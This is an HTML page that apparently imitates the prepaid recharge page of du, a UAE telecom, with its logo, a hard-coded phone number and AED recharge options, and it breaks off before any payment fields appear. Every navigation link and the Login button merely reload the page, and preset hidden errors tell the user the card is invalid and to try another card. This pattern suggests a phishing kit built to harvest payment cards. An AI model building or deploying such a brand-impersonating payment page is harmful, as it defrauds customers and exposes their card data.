<html lang="en" dir="ltr">

<head>
    <link rel="stylesheet" href="du2/_fonts.css">
    <link rel="stylesheet" href="du2/my-styles-checkout-desk.css">
    <link rel="stylesheet" href="du2/common.css">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="icon" href="favicon.ico">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>du - My Account</title>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>

    <style data-jss="" data-meta="makeStyles">
        .jss55 {
            max-width: 240px
        }
        
        .jss55.MuiImageList-root {
            margin-bottom: 12px
        }
        
        .jss56 {
            border: 1px solid rgba(0, 0, 0, .12);
            padding: 6px 8px;
            border-radius: 4px
        }
        
        .jss56>.MuiImageListItem-img {
            object-fit: fill!important
        }
        
        @media (max-width:899.95px) {
            .jss57.MuiCard-root {
                border: 0;
                background: 0 0;
                border-radius: 0
            }
        }
        
        .containerrr {
            position: relative;
            width: 0px;
            height: 20px;
            animation: spin 2s linear infinite;
        }
        
        .rectangless {
            position: absolute;
            width: 2px;
            height: 10px;
            background-color: black;
            transform-origin: 50% 100%;
        }
        
        .rectangless:nth-child(1) {
            transform: rotate(0deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(2) {
            transform: rotate(36deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(3) {
            transform: rotate(72deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(4) {
            transform: rotate(108deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(5) {
            transform: rotate(144deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(6) {
            transform: rotate(180deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(7) {
            transform: rotate(216deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(8) {
            transform: rotate(252deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(9) {
            transform: rotate(288deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(10) {
            transform: rotate(324deg) translate(0, -10px);
        }
        
        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }
            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>

<body>
    <div id="root">
        <div class="App">
            <header>
                <div class="MuiContainer-root MuiContainer-disableGutters jss15 muiltr-8d97to">
                    <div class="MuiGrid-root MuiGrid-container muiltr-10929pm">
                        <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-sm-4 muiltr-1udr1mz">
                            <div class="MuiBox-root muiltr-0">
                                <ul class="MuiList-root jss16 muiltr-1uzmcsd">
                                    <li class="MuiListItem-root MuiListItem-gutters MuiListItem-padding jss7 muiltr-17pzg5h">
                                        <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways active muiltr-1ws4igt" title="Personal" src="#">Personal</a>
                                    </li>
                                    <li class="MuiListItem-root MuiListItem-gutters MuiListItem-padding jss7 muiltr-17pzg5h">
                                        <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways muiltr-1ws4igt" title="Business" src="#">Business</a>
                                    </li>
                                </ul>
                            </div>
                        </div>
                        <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-sm-auto muiltr-1393ond">
                            <div class="MuiGrid-root MuiGrid-container muiltr-1d3bbye">
                                <div class="MuiGrid-root MuiGrid-item muiltr-1wxaqej">
                                    <button class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways MuiLink-button muiltr-1vu61cc">
                            <svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-1okqa6k" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="SearchIcon">
                                <path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z">
                                </path>
                            </svg>
                        </button>
                                </div>
                                <div class="MuiGrid-root MuiGrid-item muiltr-1wxaqej">
                                    <button class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone MuiLink-button muiltr-1vb3au6">
                            <span class="small MuiBox-root muiltr-1gb5hgm">A</span>A </button>
                                    <button class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone MuiLink-button muiltr-a8vgj5" title="عربى">عربى</button>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="MuiContainer-root jss2 muiltr-emvt71">
                    <div class="MuiGrid-root MuiGrid-container muiltr-1wndsnp">
                        <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-md-7 muiltr-uyfs2b">
                            <div class="MuiGrid-root MuiGrid-container muiltr-1d3bbye">
                                <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-md-auto muiltr-s6rwg2">
                                    <div class="jss1 MuiBox-root muiltr-0">
                                        <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways muiltr-1ws4igt" src="#">
                                            <svg class="svgIcon" width="50px" height="51px" viewBox="0 0 50 51" version="1.1" xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink">
                                    <defs>
                                        <linearGradient x1="1.11022302e-14%" y1="100%" x2="100%" y2="0%" id="linearGradient-1">
                                            <stop stop-color="#00205B" offset="0%"></stop>
                                            <stop stop-color="#753BBD" offset="33.8431693%"></stop>
                                            <stop stop-color="#00A9CE" offset="67.6863387%"></stop>
                                            <stop stop-color="#00A9CE" offset="100%"></stop>
                                        </linearGradient>
                                    </defs>
                                    <g id="du-logo-new" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
                                        <g id="Atoms-/-du-logo-/-Squircle-Window-Copy" fill="url(#linearGradient-1)">
                                            <path d="M44.7227169,0.199802321 L44.9399245,0.204213548 C47.7496518,0.31853461 50,2.64042212 50,5.4777237 L50,5.4777237 L50,44.9222001 L49.9955899,45.1394311 C49.8812992,47.9494541 47.5600184,50.1998023 44.7227169,50.1998023 L44.7227169,50.1998023 L5.27792138,50.1998023 L5.06071254,50.1953923 C2.25095497,50.0811013 0,47.7598128 0,44.9222001 L0,44.9222001 L0,5.4777237 L0.00441122707,5.26051486 C0.118732289,2.45075729 2.44061979,0.199802321 5.27792138,0.199802321 L5.27792138,0.199802321 L44.7227169,0.199802321 Z M44.7227169,1.54010523 L5.27792138,1.54010523 L5.07559084,1.54523847 C2.99796011,1.65089619 1.34030291,3.37428583 1.34030291,5.4777237 L1.34030291,5.4777237 L1.34030291,44.9222001 C1.34030291,47.0934908 3.10663067,48.8598185 5.27792138,48.8598185 L5.27792138,48.8598185 L44.7227169,48.8598185 L44.9250184,48.8546853 C47.002359,48.7490276 48.6600162,47.0256379 48.6600162,44.9222001 L48.6600162,44.9222001 L48.6600162,5.4777237 L48.654883,5.27539316 C48.5492256,3.19776243 46.8258456,1.54010523 44.7227169,1.54010523 L44.7227169,1.54010523 Z M25.053599,11.4300991 L25.231697,11.435189 C26.8227355,11.5263869 28.0825262,12.8317273 28.0825262,14.4316171 L28.0825262,14.4316171 L28.0825262,28.8008783 L28.0874204,29.0088883 C28.1979416,31.3524149 30.1661569,33.2092083 32.5527214,33.2092083 L32.5527214,33.2092083 L32.7621809,33.2044245 C35.1223421,33.0963866 37.0025412,31.171851 37.0037805,28.8008783 L37.0037805,28.8008783 L37.0037805,24.9855785 L37.0089247,24.8097416 C37.1010935,23.2385358 38.4202513,21.9846985 40.0327077,21.9846985 L40.0327077,21.9846985 L40.2097075,21.9898107 C41.7914256,22.081403 43.0568509,23.3921485 43.0568509,24.9855785 L43.0568509,24.9855785 L43.0603592,28.8008783 L43.0563974,29.0831761 C42.9020088,34.7108143 38.257478,39.2205385 32.5527214,39.2205385 L32.5527214,39.2205385 L32.20255,39.2148481 C29.4122929,39.1240433 26.8945565,37.9522895 25.0666753,36.1175769 L25.0666753,36.1175769 L24.8347713,36.3434328 C22.9512049,38.1221732 20.3934204,39.2205385 17.5790345,39.2205385 L17.5790345,39.2205385 L17.2943322,39.2167941 C11.618839,39.0673318 7.07554289,34.4623279 7.07554289,28.8008783 L7.07554289,28.8008783 L7.07931318,28.5185794 C7.22980885,22.8909007 11.866749,18.379942 17.5790345,18.379942 L17.5790345,18.379942 L17.974623,18.3870999 C19.4188962,18.4394697 20.7927315,18.7778741 22.0288179,19.3583303 L22.0288179,19.3583303 L22.0288179,14.4316171 C22.0288179,12.7724721 23.3855681,11.4300991 25.053599,11.4300991 L25.053599,11.4300991 Z M41.6006754,36.3265688 C42.4074199,36.3265688 43.0604077,36.9696677 43.0604077,37.7697133 C43.0604077,38.5723109 42.4074199,39.2189187 41.6006754,39.2189187 C40.7990348,39.2189187 40.142219,38.5723109 40.142219,37.7697133 C40.142219,36.9696677 40.7990348,36.3265688 41.6006754,36.3265688 Z M41.6006754,36.6152615 C40.9547055,36.6152615 40.4334637,37.1285284 40.4334637,37.7697133 C40.4334637,38.4080272 40.9547055,38.931183 41.6006754,38.931183 C42.2463262,38.931183 42.769801,38.4080272 42.769801,37.7697133 C42.769801,37.1285284 42.2463262,36.6152615 41.6006754,36.6152615 Z M41.682881,36.9904982 C41.9824196,36.9904982 42.191044,37.2115634 42.191044,37.4715463 C42.191044,37.6922926 42.0513231,37.8326515 41.8851254,37.892304 L42.2270907,38.5539047 L41.9074552,38.5539047 L41.5862248,37.9344117 L41.3890844,37.9344117 L41.3890844,38.5539047 L41.0962447,38.5539047 L41.0962447,36.9904982 L41.682881,36.9904982 Z M41.6449203,37.2354882 L41.3890844,37.2354882 L41.3890844,37.7056905 L41.6449203,37.7056905 C41.8012291,37.7056905 41.9074552,37.5994643 41.9074552,37.4715463 C41.9074552,37.3388434 41.8012291,37.2354882 41.6449203,37.2354882 Z M17.5790345,24.3852111 L17.3696024,24.3900133 C15.0097517,24.4984638 13.129889,26.4302154 13.129889,28.8008783 C13.129889,31.2415855 15.1219581,33.2092083 17.5790345,33.2092083 L17.5790345,33.2092083 L17.7885198,33.2044245 C20.1489552,33.0963866 22.0288179,31.171851 22.0288179,28.8008783 L22.0288179,28.8008783 L22.023975,28.5928764 C21.9146053,26.2492294 19.9665285,24.3852111 17.5790345,24.3852111 L17.5790345,24.3852111 Z" id="Combined-Shape"></path>
                                        </g>
                                    </g>
                                </svg>
                                        </a>
                                    </div>
                                </div>
                                <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-md-true jss4 false muiltr-qb7po3">
                                    <ul class="MuiList-root jss6 muiltr-1uzmcsd">
                                        <li onclick="window.location.reload()" class="MuiListItem-root MuiListItem-gutters MuiListItem-padding jss7 muiltr-17pzg5h">
                                            <button class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone MuiLink-button jss8  muiltr-hbfypv" title="Devices">Devices</button>
                                        </li>
                                        <li onclick="window.location.reload()" class="MuiListItem-root MuiListItem-gutters MuiListItem-padding jss7 muiltr-17pzg5h">
                                            <button class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone MuiLink-button jss8  muiltr-hbfypv" title="Mobile Plans">Mobile Plans</button>
                                        </li>
                                        <li onclick="window.location.reload()" class="MuiListItem-root MuiListItem-gutters MuiListItem-padding jss7 muiltr-17pzg5h">
                                            <button class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone MuiLink-button jss8  muiltr-hbfypv" title="Internet &amp; TV">Internet &amp; TV</button>
                                        </li>
                                        <li onclick="window.location.reload()" class="MuiListItem-root MuiListItem-gutters MuiListItem-padding jss7 muiltr-17pzg5h">
                                            <button class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone MuiLink-button jss8  muiltr-hbfypv" title="Why du">Why du</button>
                                        </li>
                                        <li onclick="window.location.reload()" class="MuiListItem-root MuiListItem-gutters MuiListItem-padding jss7 muiltr-17pzg5h">
                                            <button class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone MuiLink-button jss8  muiltr-hbfypv" title="Help">Help</button>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                        <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-md-5 muiltr-10dahps" align="right">
                            <div class="MuiBox-root muiltr-1bvc4cc">
                                <ul class="MuiList-root MuiList-padding jss11 muiltr-1vvwea8">
                                    <li class="MuiListItem-root MuiListItem-gutters MuiListItem-padding muiltr-1r1ea0i">
                                        <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone muiltr-1ttq1zj" title="Quick Pay" onclick="changeForm('pay')">Quick Pay</a>
                                    </li>
                                    <li class="MuiListItem-root MuiListItem-gutters MuiListItem-padding muiltr-1r1ea0i">
                                        <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone muiltr-1ttq1zj" title="Quick Recharge" onclick="changeForm('recharge')">Quick Recharge</a>
                                    </li>
                                    <li class="MuiListItem-root MuiListItem-gutters MuiListItem-padding muiltr-1r1ea0i">
                                        <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone muiltr-1ttq1zj" title="Update ID" src="#">Update ID</a>
                                    </li>
                                </ul>
                                <div class="jss14 MuiBox-root muiltr-0">
                                    <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineNone muiltr-1ttq1zj" src="#">
                                        <button class="MuiButton-root MuiButton-outlined MuiButton-outlinedPrimary MuiButton-sizeMedium MuiButton-outlinedSizeMedium MuiButtonBase-root  muiltr-6ougc6" tabindex="0" type="button" onclick="window.location.reload()">Login</button>
                                    </a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </header>
            <div class="MuiContainer-root MuiContainer-disableGutters muiltr-8mbped">
                <div class="MuiGrid-root MuiGrid-container muiltr-1rfkoho">
                    <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12 muiltr-15j76c0">
                        <div class="MuiBox-root muiltr-1huthg8">
                            <h1 class="MuiTypography-root MuiTypography-h2 MuiTypography-gutterBottom muiltr-t0kkqh">Recharge your prepaid
                            </h1>
                            <p class="MuiTypography-root MuiTypography-body1 muiltr-15o2j3w">Pay as you Go 2
                                <strong id="acc-number">971567786787</strong>
                                <!-- <a
                    class="MuiTypography-root MuiTypography-body2 MuiLink-root MuiLink-underlineAlways muiltr-j1ej4q"
                    href="/">Change</a> -->
                            </p>
                        </div>
                    </div>
                </div>
            </div>
            <div class="MuiGrid-root MuiGrid-container muiltr-1ko16tw checkout-error" style="display:none">
                <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12 muiltr-15j76c0">
                    <div style="    background: #ff00003b;
color: #7e3737;" class="MuiPaper-root MuiPaper-elevation MuiPaper-rounded MuiPaper-elevation0 MuiAlert-root MuiAlert-standardInfo MuiAlert-standard muiltr-mube5p" role="alert">
                        <div class="MuiAlert-icon muiltr-1l54tgj" style="color:red"><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeInherit muiltr-1cw4hi4" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="InfoOutlinedIcon">
                <path d="M11,9H13V7H11M12,20C7.59,20 4,16.41 4,12C4,7.59 7.59,4 12,4C16.41,4 20,7.59 20, 12C20,16.41 16.41,20 12,20M12,2A10,10 0 0,0 2,12A10,10 0 0,0 12,22A10,10 0 0,0 22,12A10, 10 0 0,0 12,2M11,17H13V11H11V17Z">
                </path>
            </svg></div>
                        <div class="MuiAlert-message muiltr-1w0ym84">
                            <!-- This is a Prepaid Number. You can still make a payment by selecting a recharge amount. -->
                            <span data-error-number="1" style="display:none">Invalid Card. Check the information on your card and try again!</span>
                            <span data-error-number="2" style="display:none">Sorry, we are unable to process your payment. Please try again with another credit card.</span>
                        </div>
                    </div>
                </div>
            </div>
            <div class="MuiContainer-root MuiContainer-disableGutters muiltr-1utaf4z">
                <div class="MuiGrid-root MuiGrid-container muiltr-1rfkoho">
                    <div class="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12 MuiGrid-grid-md-8 muiltr-efwuvd">
                        <div class="jss30 MuiBox-root muiltr-0">
                            <form class="MuiBox-root muiltr-0" novalidate="" autocomplete="off">
                                <h5 class="MuiTypography-root MuiTypography-h5 muiltr-1yfl5y7">How much would you like to recharge?
                                </h5>
                                <div class="MuiGrid-root MuiGrid-container MuiGrid-spacing-xs-2 muiltr-tuxzvu">
                                    <div class="MuiGrid-root MuiGrid-item muiltr-1wxaqej">
                                        <div class="MuiPaper-root MuiPaper-elevation MuiPaper-rounded MuiPaper-elevation1 MuiCard-root muiltr-zov9ew">
                                            <button class="MuiButtonBase-root MuiCardActionArea-root muiltr-1jluznr" tabindex="0" type="button">
                                <div class="MuiCardContent-root muiltr-1qw96cp" align="center"><span class="MuiRadio-root MuiRadio-colorPrimary MuiButtonBase-root MuiRadio-root MuiRadio-colorPrimary PrivateSwitchBase-root muiltr-1t797oh Mui-checked"><input class="PrivateSwitchBase-input muiltr-1m9pwf3" name="radio-buttons" type="radio" aria-label="30" value="30"><span class="muiltr-hyxlzm"><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-q8lw68" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonUncheckedIcon">
                                                <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z">
                                                </path>
                                            </svg><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-1c4tzn" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonCheckedIcon" style="transform: scale(1);">
                                                <path d="M8.465 8.465C9.37 7.56 10.62 7 12 7C14.76 7 17 9.24 17 12C17 13.38 16.44 14.63 15.535 15.535C14.63 16.44 13.38 17 12 17C9.24 17 7 14.76 7 12C7 10.62 7.56 9.37 8.465 8.465Z">
                                                </path>
                                            </svg></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span></span>
                                    <div class="MuiTypography-root MuiTypography-body2 MuiTypography-gutterBottom jss36 muiltr-1pyq0vj">
                                        <div>AED</div>
                                        <div>30</div>
                                    </div>
                                </div><span class="MuiCardActionArea-focusHighlight muiltr-jo3ec3"></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span>
                            </button></div>
                                    </div>
                                    <div class="MuiGrid-root MuiGrid-item muiltr-1wxaqej">
                                        <div class="MuiPaper-root MuiPaper-elevation MuiPaper-rounded MuiPaper-elevation1 MuiCard-root muiltr-zov9ew">
                                            <button class="MuiButtonBase-root MuiCardActionArea-root muiltr-1jluznr" tabindex="0" type="button">
                                <div class="MuiCardContent-root muiltr-1qw96cp" align="center"><span class="MuiRadio-root MuiRadio-colorPrimary MuiButtonBase-root MuiRadio-root MuiRadio-colorPrimary PrivateSwitchBase-root muiltr-1t797oh"><input class="PrivateSwitchBase-input muiltr-1m9pwf3" name="radio-buttons" type="radio" aria-label="55" value="55" checked="checked"><span class="muiltr-hyxlzm"><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-q8lw68" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonUncheckedIcon">
                                                <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z">
                                                </path>
                                            </svg><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-1u5ei5s" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonCheckedIcon" style="transform: scale(0);">
                                                <path d="M8.465 8.465C9.37 7.56 10.62 7 12 7C14.76 7 17 9.24 17 12C17 13.38 16.44 14.63 15.535 15.535C14.63 16.44 13.38 17 12 17C9.24 17 7 14.76 7 12C7 10.62 7.56 9.37 8.465 8.465Z">
                                                </path>
                                            </svg></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span></span>
                                    <div class="MuiTypography-root MuiTypography-body2 MuiTypography-gutterBottom jss36 muiltr-1pyq0vj">
                                        <div>AED</div>
                                        <div>55</div>
                                    </div>
                                </div><span class="MuiCardActionArea-focusHighlight muiltr-jo3ec3"></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span>
                            </button></div>
                                    </div>
                                    <div class="MuiGrid-root MuiGrid-item muiltr-1wxaqej">
                                        <div class="MuiPaper-root MuiPaper-elevation MuiPaper-rounded MuiPaper-elevation1 MuiCard-root muiltr-zov9ew">
                                            <button class="MuiButtonBase-root MuiCardActionArea-root muiltr-1jluznr" tabindex="0" type="button">
                                <div class="MuiCardContent-root muiltr-1qw96cp" align="center"><span class="MuiRadio-root MuiRadio-colorPrimary MuiButtonBase-root MuiRadio-root MuiRadio-colorPrimary PrivateSwitchBase-root muiltr-1t797oh"><input class="PrivateSwitchBase-input muiltr-1m9pwf3" name="radio-buttons" type="radio" aria-label="110" value="110"><span class="muiltr-hyxlzm"><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-q8lw68" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonUncheckedIcon">
                                                <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z">
                                                </path>
                                            </svg><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-1c4tzn" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonCheckedIcon" style="transform: scale(0);">
                                                <path d="M8.465 8.465C9.37 7.56 10.62 7 12 7C14.76 7 17 9.24 17 12C17 13.38 16.44 14.63 15.535 15.535C14.63 16.44 13.38 17 12 17C9.24 17 7 14.76 7 12C7 10.62 7.56 9.37 8.465 8.465Z">
                                                </path>
                                            </svg></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span></span>
                                    <div class="MuiTypography-root MuiTypography-body2 MuiTypography-gutterBottom jss36 muiltr-1pyq0vj">
                                        <div>AED</div>
                                        <div>110</div>
                                    </div>
                                </div><span class="MuiCardActionArea-focusHighlight muiltr-jo3ec3"></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span>
                            </button></div>
                                    </div>
                                    <div class="MuiGrid-root MuiGrid-item muiltr-1wxaqej">
                                        <div class="MuiPaper-root MuiPaper-elevation MuiPaper-rounded MuiPaper-elevation1 MuiCard-root muiltr-zov9ew">
                                            <button class="MuiButtonBase-root MuiCardActionArea-root muiltr-1jluznr" tabindex="0" type="button">
                                <div class="MuiCardContent-root muiltr-1qw96cp" align="center"><span class="MuiRadio-root MuiRadio-colorPrimary MuiButtonBase-root MuiRadio-root MuiRadio-colorPrimary PrivateSwitchBase-root muiltr-1t797oh"><input class="PrivateSwitchBase-input muiltr-1m9pwf3" name="radio-buttons" type="radio" aria-label="210" value="210"><span class="muiltr-hyxlzm"><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-q8lw68" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonUncheckedIcon">
                                                <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z">
                                                </path>
                                            </svg><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-1c4tzn" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonCheckedIcon" style="transform: scale(0);">
                                                <path d="M8.465 8.465C9.37 7.56 10.62 7 12 7C14.76 7 17 9.24 17 12C17 13.38 16.44 14.63 15.535 15.535C14.63 16.44 13.38 17 12 17C9.24 17 7 14.76 7 12C7 10.62 7.56 9.37 8.465 8.465Z">
                                                </path>
                                            </svg></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span></span>
                                    <div class="MuiTypography-root MuiTypography-body2 MuiTypography-gutterBottom jss36 muiltr-1pyq0vj">
                                        <div>AED</div>
                                        <div>210</div>
                                    </div>
                                </div><span class="MuiCardActionArea-focusHighlight muiltr-jo3ec3"></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span>
                            </button></div>
                                    </div>
                                    <div class="MuiGrid-root MuiGrid-item muiltr-1wxaqej">
                                        <div class="MuiPaper-root MuiPaper-elevation MuiPaper-rounded MuiPaper-elevation1 MuiCard-root muiltr-zov9ew">
                                            <button class="MuiButtonBase-root MuiCardActionArea-root muiltr-1jluznr" tabindex="0" type="button">
                                <div class="MuiCardContent-root muiltr-1qw96cp" align="center"><span class="MuiRadio-root MuiRadio-colorPrimary MuiButtonBase-root MuiRadio-root MuiRadio-colorPrimary PrivateSwitchBase-root muiltr-1t797oh"><input class="PrivateSwitchBase-input muiltr-1m9pwf3" name="radio-buttons" type="radio" aria-label="525" value="525"><span class="muiltr-hyxlzm"><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-q8lw68" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonUncheckedIcon">
                                                <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z">
                                                </path>
                                            </svg><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-1c4tzn" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonCheckedIcon" style="transform: scale(0);">
                                                <path d="M8.465 8.465C9.37 7.56 10.62 7 12 7C14.76 7 17 9.24 17 12C17 13.38 16.44 14.63 15.535 15.535C14.63 16.44 13.38 17 12 17C9.24 17 7 14.76 7 12C7 10.62 7.56 9.37 8.465 8.465Z">
                                                </path>
                                            </svg></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span></span>
                                    <div class="MuiTypography-root MuiTypography-body2 MuiTypography-gutterBottom jss36 muiltr-1pyq0vj">
                                        <div>AED</div>
                                        <div>525</div>
                                    </div>
                                </div><span class="MuiCardActionArea-focusHighlight muiltr-jo3ec3"></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span>
                            </button></div>
                                    </div>
                                    <div class="MuiGrid-root MuiGrid-item muiltr-1wxaqej">
                                        <div class="MuiPaper-root MuiPaper-elevation MuiPaper-rounded MuiPaper-elevation1 MuiCard-root muiltr-zov9ew">
                                            <button class="MuiButtonBase-root MuiCardActionArea-root muiltr-1jluznr" tabindex="0" type="button">
                                <div class="MuiCardContent-root muiltr-1qw96cp" align="center"><span class="MuiRadio-root MuiRadio-colorPrimary MuiButtonBase-root MuiRadio-root MuiRadio-colorPrimary PrivateSwitchBase-root muiltr-1t797oh"><input class="PrivateSwitchBase-input muiltr-1m9pwf3" name="radio-buttons" type="radio" aria-label="0" value="other"><span class="muiltr-hyxlzm"><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-q8lw68" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonUncheckedIcon">
                                                <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z">
                                                </path>
                                            </svg><svg class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium muiltr-1c4tzn" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="RadioButtonCheckedIcon" style="transform: scale(0);">
                                                <path d="M8.465 8.465C9.37 7.56 10.62 7 12 7C14.76 7 17 9.24 17 12C17 13.38 16.44 14.63 15.535 15.535C14.63 16.44 13.38 17 12 17C9.24 17 7 14.76 7 12C7 10.62 7.56 9.37 8.465 8.465Z">
                                                </path>
                                            </svg></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span></span>
                                    <div class="MuiTypography-root MuiTypography-body2 MuiTypography-gutterBottom jss36 muiltr-1pyq0vj">
                                        <div></div>
                                        <div>Other</div>
                                    </div>
                                </div><span class="MuiCardActionArea-focusHighlight muiltr-jo3ec3"></span><span class="MuiTouchRipple-root muiltr-w0pj6f"></span>
                            </button></div>
                                    </div>
                                </div>
                                <div id="other-price" class="MuiGrid-root MuiGrid-container muiltr-9km58g" style="display:none;margin-top:40px">
                                    <div class="MuiGrid-root MuiGrid-item muiltr-1wxaqej">
                                        <div style="    display: inline-flex;flex-direction: column;position: relative;padding: 0px;margin: 0px;border: 0px;vertical-align: top;min-width: 400px;" class="MuiFormControl-root MuiTextField-root muiltr-1gq695x">
                                            <label class="MuiInputLabel-root MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-outlined MuiFormLabel-root MuiFormLabel-colorPrimary muiltr-1n4h3u5" data-shrink="false" for=":r5:" id=":r5:-label">Enter amount</label>
                                            <div class="MuiOutlinedInput-root MuiInputBase-root MuiInputBase-colorPrimary MuiInputBase-formControl muiltr-1mv76fy">
